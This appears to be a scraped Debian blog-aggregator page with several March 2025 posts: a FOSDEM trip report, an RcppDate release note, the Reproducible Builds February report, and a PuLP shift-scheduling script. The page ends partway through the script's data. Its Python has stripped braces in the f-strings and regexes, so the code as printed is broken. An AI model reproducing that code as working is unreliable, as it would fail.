  2. The diagnostics analysis of debian/control will now identify and flag simple duplicated relations (complex ones like OR relations are ignored for now). Thanks to Matthias Geiger for suggesting the feature and Otto Kek l inen for reporting a false positive that is now fixed.

Closing I am glad I tested with kate to weed out most of these issues in time before the freeze. The Debian freeze will start within a week from now. Since debputy is a part of the toolchain packages it will be frozen from there except for important bug fixes.

7 March 2025

Paulo Henrique de Lima Santana: Bits from FOSDEM 2025

This year I was at FOSDEM 2025, and it was the fifth edition in a row that I participated in person (before it was in 2019, 2020, 2023 and 2024). The event took place on February 1st and 2nd, as always at the ULB campus in Brussels. We arrived on Friday at lunchtime and went straight to the hotel to drop off our bags. This time we stayed at Ibis in the city center, very close to the hustle and bustle. The price was good and the location was really good for us to be able to go out in the city center and come back late at night. We found a Japanese restaurant near the hotel and it was definitely worth having lunch there because of the all-you-can-eat price. After taking a nap, we went out for a walk. Since January 31st is the last day of the winter sales in the city, the streets in the city center were crowded, there were lots of people in the stores, and the prices were discounted. We concluded that if we have the opportunity to go to Brussels again at this time, it would be better wait to buy clothes for cold weather there.
Fosdem 2025
Unlike in 2023 and 2024, the FOSDEM organization did not approve my request for the Translations DevRoom,so my goal was to participate in the event and collaborate at the Debian booth. And also as I always do, I volunteered to operate the broadcast camera in the main auditorium on both days, for two hours each. The Debian booth:
Fosdem 2025
Me in the auditorium helping with the broadcast:
Fosdem 2025
2 weeks before the event, the organization put out a call for interested people to request a room for their community s BoF (Birds of a Feather), and I requested a room for Debian and it was approved :-) It was great to see that people were really interested in participating at the BoF and the room was packed! As the host of the discussions, I tried to leave the space open for anyone who wanted to talk about any subject related to Debian. We started with a talk from MiniDebConf25 organizers, that will be taking place this year in France. Then other topics followed with people talking, asking and answering questions, etc. It was worth organizing this BoF. Who knows, the idea will remain in 2026.
Fosdem 2025
Carlos (a.k.a Charles), Athos, Ma ra and Melissa talked at Fosdem, and Kanashiro was one for organizers of Distributions DevRoom
Fosdem 2025
During the two days of the event, it didn t rain or get too cold. The days were sunny (and people celebrated the weather in Brussels). But I have to admit that it would have been nice to see snow like I did in 2019. Unlike last year, this time I felt more motivated to stay at the event the whole time. Deixo meu agradecimento especial para o Andreas Tille, atual L der do Debian que aprovou o meu pedido de passagens para que eu pudesse participar dos FOSDEM 2025. Como sempre, essa ajuda foi essencial para viabilizar a minha viagem para Bruxelas. I would like to give my special thanks to Andreas Tille, the current Debian Leader, who approved my request for flight tickets so that I could join FOSDEM 2025. As always, this help was essential in making my trip to Brussels possible. And once again Jandira was with me on this adventure. On Monday we went for a walk around Brussels and we also traveled to visit Bruges again. The visit to this city is really worth it because walking through the historic streets is like going back in time. This time we even took a boat trip through the canals, which was really cool.
Fosdem 2025

Fosdem 2025

6 March 2025

Dirk Eddelbuettel: RcppDate 0.0.5: Address Minor Compiler Nag

RcppDate wraps the featureful date library written by Howard Hinnant for use with R. This header-only modern C++ library has been in pretty wide-spread use for a while now, and adds to C++11/C++14/C++17 what will is (with minor modifications) the date library in C++20. The RcppDate adds no extra R or C++ code and can therefore be a zero-cost dependency for any other project; yet a number of other projects decided to re-vendor it resulting in less-efficient duplication. Oh well. C est la via. This release sync wuth the (already mostly included) upstream release 3.0.3, and also addresses a new fresh (and mildly esoteric) nag from clang++-20. One upstream PR already addressed this in the files tickled by some CRAN packages, I followed this up with another upstream PR addressing this in a few more occurrences.

Changes in version 0.0.5 (2025-03-06)
  • Updated to upstream version 3.0.3
  • Updated 'whitespace in literal' issue upsetting clang++-20; this is also fixed upstream via two PRs

Courtesy of my CRANberries, there is also a diffstat report for the most recent release. More information is available at the repository or the package page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

5 March 2025

Reproducible Builds: Reproducible Builds in February 2025

Welcome to the second report in 2025 from the Reproducible Builds project. Our monthly reports outline what we ve been up to over the past month, and highlight items of news from elsewhere in the increasingly-important area of software supply-chain security. As usual, however, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. Table of contents:
  1. Reproducible Builds at FOSDEM 2025
  2. Reproducible Builds at PyCascades 2025
  3. Does Functional Package Management Enable Reproducible Builds at Scale?
  4. reproduce.debian.net updates
  5. Upstream patches
  6. Distribution work
  7. diffoscope & strip-nondeterminism
  8. Website updates
  9. Reproducibility testing framework

Reproducible Builds at FOSDEM 2025 Similar to last year s event, there was considerable activity regarding Reproducible Builds at FOSDEM 2025, held on on 1st and 2nd February this year in Brussels, Belgium. We count at least four talks related to reproducible builds. (You can also read our news report from last year s event in which Holger Levsen presented in the main track.)
Jelle van der Waa, Holger Levsen and kpcyrd presented in the Distributions track on A Tale of several distros joining forces for a common goal. In this talk, three developers from two different Linux distributions (Arch Linux and Debian), discuss this goal which is, of course, reproducible builds. The presenters discuss both what is shared and different between the two efforts, touching on the history and future challenges alike. The slides of this talk are available to view, as is the full video (30m02s). The talk was also discussed on Hacker News.
Zbigniew J drzejewski-Szmek presented in the ever-popular Python track a on Rewriting .pyc files for fun and reproducibility, i.e. the bytecode files generated by Python in order to speed up module imports: It s been known for a while that those are not reproducible: on different architectures, the bytecode for exactly the same sources ends up slightly different. The slides of this talk are available, as is the full video (28m32s).
In the Nix and NixOS track, Julien Malka presented on the Saturday asking How reproducible is NixOS: We know that the NixOS ISO image is very close to be perfectly reproducible thanks to reproducible.nixos.org, but there doesn t exist any monitoring of Nixpkgs as a whole. In this talk I ll present the findings of a project that evaluated the reproducibility of Nixpkgs as a whole by mass rebuilding packages from revisions between 2017 and 2023 and comparing the results with the NixOS cache. Unfortunately, no video of the talk is available, but there is a blog and article on the results.
Lastly, Simon Tournier presented in the Open Research track on the confluence of GNU Guix and Software Heritage: Source Code Archiving to the Rescue of Reproducible Deployment. Simon s talk describes design and implementation we came up and reports on the archival coverage for package source code with data collected over five years. It opens to some remaining challenges toward a better open and reproducible research. The slides for the talk are available, as is the full video (23m17s).

Reproducible Builds at PyCascades 2025 Vagrant Cascadian presented at this year s PyCascades conference which was held on February 8th and 9th February in Portland, OR, USA. PyCascades is a regional instance of PyCon held in the Pacific Northwest. Vagrant s talk, entitled Re-Py-Ducible Builds caught the audience s attention with the following abstract:
Crank your Python best practices up to 11 with Reproducible Builds! This talk will explore Reproducible Builds by highlighting issues identified in Python projects, from the simple to the seemingly inscrutable. Reproducible Builds is basically the crazy idea that when you build something, and you build it again, you get the exact same thing or even more important, if someone else builds it, they get the exact same thing too.
More info is available on the talk s page.

Does Functional Package Management Enable Reproducible Builds at Scale? On our mailing list last month, Julien Malka, Stefano Zacchiroli and Th o Zimmermann of T l com Paris in-house research laboratory, the Information Processing and Communications Laboratory (LTCI) announced that they had published an article asking the question: Does Functional Package Management Enable Reproducible Builds at Scale? (PDF). This month, however, Ludovic Court s followed up to the original announcement on our mailing list mentioning, amongst other things, the Guix Data Service and how that it shows the reproducibility of GNU Guix over time, as described in a GNU Guix blog back in March 2024.

reproduce.debian.net updates The last few months have seen the introduction of reproduce.debian.net. Announced first at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project. Powering this work is rebuilderd, our server which monitors the official package repositories of Linux distributions and attempt to reproduce the observed results there. This month, however, Holger Levsen:
  • Split packages that are not specific to any architecture away from amd64.reproducible.debian.net service into a new all.reproducible.debian.net page.
  • Increased the number of riscv64 nodes to a total of 4, and added a new amd64 node added thanks to our (now 10-year sponsor), IONOS.
  • Discovered an issue in the Debian build service where some new incoming build-dependencies do not end up historically archived.
  • Uploaded the devscripts package, incorporating changes from Jochen Sprickerhof to the debrebuild script specifically to fix the handling the Rules-Requires-Root header in Debian source packages.
  • Uploaded a number of Rust dependencies of rebuilderd (rust-libbz2-rs-sys, rust-actix-web, rust-actix-server, rust-actix-http, rust-actix-server, rust-actix-http, rust-actix-web-codegen and rust-time-tz) after they were prepared by kpcyrd :
Jochen Sprickerhof also updated the sbuild package to:
  • Obey requests from the user/developer for a different temporary directory.
  • Use the root/superuser for some values of Rules-Requires-Root.
  • Don t pass --root-owner-group to old versions of dpkg.
and additionally requested that many Debian packages are rebuilt by the build servers in order to work around bugs found on reproduce.debian.net. [ ][[ ][ ]
Lastly, kpcyrd has also worked towards getting rebuilderd packaged in NixOS, and Jelle van der Waa picked up the existing pull request for Fedora support within in rebuilderd and made it work with the existing Koji rebuilderd script. The server is being packaged for Fedora in an unofficial copr repository and in the official repositories after all the dependencies are packaged.

Upstream patches The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:

Distribution work There as been the usual work in various distributions this month, such as: In Debian, 17 reviews of Debian packages were added, 6 were updated and 8 were removed this month adding to our knowledge about identified issues.
Fedora developers Davide Cavalca and Zbigniew J drzejewski-Szmek gave a talk on Reproducible Builds in Fedora (PDF), touching on SRPM-specific issues as well as the current status and future plans.
Thanks to an investment from the Sovereign Tech Agency, the FreeBSD project s work on unprivileged and reproducible builds continued this month. Notable fixes include:
The Yocto Project has been struggling to upgrade to the latest Go and Rust releases due to reproducibility problems in the newer versions. Hongxu Jia tracked down the issue with Go which meant that the project could upgrade from the 1.22 series to 1.24, with the fix being submitted upstream for review (see above). For Rust, however, the project was significantly behind, but has made recent progress after finally identifying the blocking reproducibility issues. At time of writing, the project is at Rust version 1.82, with patches under review for 1.83 and 1.84 and fixes being discussed with the Rust developers. The project hopes to improve the tests for reproducibility in the Rust project itself in order to try and avoid future regressions. Yocto continues to maintain its ability to binary reproduce all of the recipes in OpenEmbedded-Core, regardless of the build host distribution or the current build path.
Finally, Douglas DeMaio published an article on the openSUSE blog on announcing that the Reproducible-openSUSE (RBOS) Project Hits [Significant] Milestone. In particular:
The Reproducible-openSUSE (RBOS) project, which is a proof-of-concept fork of openSUSE, has reached a significant milestone after demonstrating a usable Linux distribution can be built with 100% bit-identical packages.
This news was also announced on our mailing list by Bernhard M. Wiedemann, who also published another report for openSUSE as well.

diffoscope & strip-nondeterminism diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 288 and 289 to Debian:
  • Add asar to DIFFOSCOPE_FAIL_TESTS_ON_MISSING_TOOLS in order to address Debian bug #1095057) [ ]
  • Catch a CalledProcessError when calling html2text. [ ]
  • Update the minimal Black version. [ ]
Additionally, Vagrant Cascadian updated diffoscope in GNU Guix to version 287 [ ][ ] and 288 [ ][ ] as well as submitted a patch to update to 289 [ ]. Vagrant also fixed an issue that was breaking reprotest on Guix [ ][ ]. strip-nondeterminism is our sister tool to remove specific non-deterministic results from a completed build. This month version 1.14.1-2 was uploaded to Debian unstable by Holger Levsen.

Website updates There were a large number of improvements made to our website this month, including:

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In January, a number of changes were made by Holger Levsen, including:
  • reproduce.debian.net-related:
    • Add a helper script to manually schedule packages. [ ][ ][ ][ ][ ]
    • Fix a link in the website footer. [ ]
    • Strip the emojis from package names on the manual rebuilder in order to ease copy-and-paste. [ ]
    • On the various statistics pages, provide the number of affected source packages [ ][ ] as well as provide various totals [ ][ ].
    • Fix graph labels for the various architectures [ ][ ] and make them clickable too [ ][ ][ ].
    • Break the displayed HTML in blocks of 256 packages in order to address rendering issues. [ ][ ]
    • Add monitoring jobs for riscv64 archicture nodes and integrate them elsewhere in our infrastructure. [ ][ ]
    • Add riscv64 architecture nodes. [ ][ ][ ][ ][ ]
    • Update much of the documentation. [ ][ ][ ]
    • Make a number of improvements to the layout and style. [ ][ ][ ][ ][ ][ ][ ]
    • Remove direct links to JSON and database backups. [ ]
    • Drop a Blues Brothers reference from frontpage. [ ]
  • Debian-related:
    • Deal with /boot/vmlinuz* being called vmlinux* on the riscv64 architecture. [ ]
    • Add a new ionos17 node. [ ][ ][ ][ ][ ]
    • Install debian-repro-status on all Debian trixie and unstable jobs. [ ]
  • FreeBSD-related:
    • Switch to run latest branch of FreeBSD. [ ]
  • Misc:
    • Fix /etc/cron.d and /etc/logrotate.d permissions for Jenkins nodes. [ ]
    • Add support for riscv64 architecture nodes. [ ][ ]
    • Grant Jochen Sprickerhof access to the o4 node. [ ]
    • Disable the janitor-setup-worker. [ ][ ]
In addition:
  • kpcyrd fixed the /all/api/ API endpoints on reproduce.debian.net by altering the nginx configuration. [ ]
  • James Addison updated reproduce.debian.net to display the so-called bad reasons hyperlink inline [ ] and merged the Categorized issues links into the Reproduced builds column [ ].
  • Jochen Sprickerhof also made some reproduce.debian.net-related changes, adding support for detecting a bug in the mmdebstrap package [ ] as well as updating some documentation [ ].
  • Roland Clobus continued their work on reproducible live images for Debian, making changes related to new clustering of jobs in openQA. [ ]
And finally, both Holger Levsen [ ][ ][ ] and Vagrant Cascadian performed significant node maintenance. [ ][ ][ ][ ][ ]
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

Dima Kogan: Shop scheduling with PuLP

I recently used the PuLP modeler to solve a work scheduling problem to assign workers to shifts. Here are notes about doing that. This is a common use case, but isn't explicitly covered in the case studies in the PuLP documentation. Here's the problem: The tool is supposed to allocate workers to the shifts to try to cover all the shifts, give everybody work, and try to match their preferences. I implemented the tool:
#!/usr/bin/python3
import sys
import os
import re
def report_solution_to_console(vars):
    for w in days_of_week:
        annotation = ''
        if human_annotate is not None:
            for s in shifts.keys():
                m = re.match(rf' w  - ', s)
                if not m: continue
                if vars[human_annotate][s].value():
                    annotation = f" ( human_annotate  SCHEDULED)"
                    break
            if not len(annotation):
                annotation = f" ( human_annotate  OFF)"
        print(f" w annotation ")
        for s in shifts.keys():
            m = re.match(rf' w  - ', s)
            if not m: continue
            annotation = ''
            if human_annotate is not None:
                annotation = f" ( human_annotate   shifts[s][human_annotate] )"
            print(f"    ----  s[m.end():] annotation ")
            for h in humans:
                if vars[h][s].value():
                    print(f"          h  ( shifts[s][h] )")
def report_solution_summary_to_console(vars):
    print("\nSUMMARY")
    for h in humans:
        print(f"--  h ")
        print(f"   benefit:  benefits[h].value():.3f ")
        counts = dict()
        for a in availabilities:
            counts[a] = 0
        for s in shifts.keys():
            if vars[h][s].value():
                counts[shifts[s][h]] += 1
        for a in availabilities:
            print(f"    counts[a]   a ")
human_annotate = None
days_of_week = ('SUNDAY',
                'MONDAY',
                'TUESDAY',
                'WEDNESDAY',
                'THURSDAY',
                'FRIDAY',
                'SATURDAY')
humans = ['ALICE', 'BOB',
          'CAROL', 'DAVID', 'EVE', 'FRANK', 'GRACE', 'HEIDI', 'IVAN', 'JUDY']
shifts =  'SUNDAY - SANDING 9:00 AM - 4:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'DISFAVORED',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'JUDY':  'NEUTRAL' ,
          'WEDNESDAY - SAWING 7:30 AM - 2:30 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'EVE':   'REFUSED',
           'JUDY':  'REFUSED' ,
          'THURSDAY - SANDING 9:00 AM - 4:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED' ,
          'SATURDAY - SAWING 7:30 AM - 2:30 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'EVE':   'REFUSED',
           'JUDY':  'REFUSED',
           'GRACE': 'REFUSED' ,
          'SUNDAY - SAWING 9:00 AM - 4:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED' ,
          'MONDAY - SAWING 9:00 AM - 4:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED' ,
          'TUESDAY - SAWING 9:00 AM - 4:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED' ,
          'WEDNESDAY - PAINTING 7:30 AM - 2:30 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'EVE':   'REFUSED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED' ,
          'THURSDAY - SAWING 9:00 AM - 4:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED' ,
          'FRIDAY - SAWING 9:00 AM - 4:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'IVAN':  'PREFERRED',
           'JUDY':  'DISFAVORED',
           'HEIDI': 'REFUSED' ,
          'SATURDAY - PAINTING 7:30 AM - 2:30 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'EVE':   'REFUSED',
           'JUDY':  'REFUSED',
           'GRACE': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'SUNDAY - PAINTING 9:45 AM - 4:45 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'MONDAY - PAINTING 9:45 AM - 4:45 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'IVAN':  'PREFERRED',
           'JUDY':  'NEUTRAL',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'TUESDAY - PAINTING 9:45 AM - 4:45 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'WEDNESDAY - SANDING 9:45 AM - 4:45 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'DAVID': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'JUDY':  'NEUTRAL',
           'EVE':   'REFUSED' ,
          'THURSDAY - PAINTING 9:45 AM - 4:45 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'FRIDAY - PAINTING 9:45 AM - 4:45 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'IVAN':  'PREFERRED',
           'JUDY':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'SATURDAY - SANDING 9:45 AM - 4:45 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'DAVID': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'EVE':   'REFUSED',
           'JUDY':  'REFUSED',
           'GRACE': 'REFUSED' ,
          'SUNDAY - PAINTING 11:00 AM - 6:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'PREFERRED',
           'IVAN':  'NEUTRAL',
           'JUDY':  'NEUTRAL',
           'DAVID': 'REFUSED' ,
          'MONDAY - PAINTING 12:00 PM - 7:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'PREFERRED',
           'IVAN':  'NEUTRAL',
           'JUDY':  'NEUTRAL',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'TUESDAY - PAINTING 12:00 PM - 7:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'HEIDI': 'REFUSED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED' ,
          'WEDNESDAY - PAINTING 12:00 PM - 7:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'JUDY':  'PREFERRED',
           'EVE':   'REFUSED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'THURSDAY - PAINTING 12:00 PM - 7:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'FRIDAY - PAINTING 12:00 PM - 7:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'JUDY':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'SATURDAY - PAINTING 12:00 PM - 7:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'FRANK': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'JUDY':  'DISFAVORED',
           'EVE':   'REFUSED',
           'HEIDI': 'REFUSED',
           'GRACE': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'SUNDAY - SAWING 12:00 PM - 7:00 PM':
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'MONDAY - SAWING 2:00 PM - 9:00 PM':
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'TUESDAY - SAWING 2:00 PM - 9:00 PM':
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED' ,
          'WEDNESDAY - SAWING 2:00 PM - 9:00 PM':
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'EVE':   'REFUSED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'THURSDAY - SAWING 2:00 PM - 9:00 PM':
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'FRIDAY - SAWING 2:00 PM - 9:00 PM':
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED' ,
          'SATURDAY - SAWING 2:00 PM - 9:00 PM':
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'EVE':   'REFUSED',
           'HEIDI': 'REFUSED',
           'GRACE': 'REFUSED',
           'DAVID': 'REFUSED' ,
          'SUNDAY - PAINTING 12:15 PM - 7:15 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'NEUTRAL',
           'DAVID': 'REFUSED' ,
          'MONDAY - PAINTING 2:00 PM - 9:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'DAVID': 'REFUSED' ,
          'TUESDAY - PAINTING 2:00 PM - 9:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED' ,
          'WEDNESDAY - PAINTING 2:00 PM - 9:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'EVE':   'REFUSED',
           'DAVID': 'REFUSED' ,
          'THURSDAY - PAINTING 2:00 PM - 9:00 PM':
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'DAVID': 'REFUSED' ,
          'FRIDAY - PAINTING 2:00 PM - 9:00 PM':
           'ALICE': 'NEUTRAL',
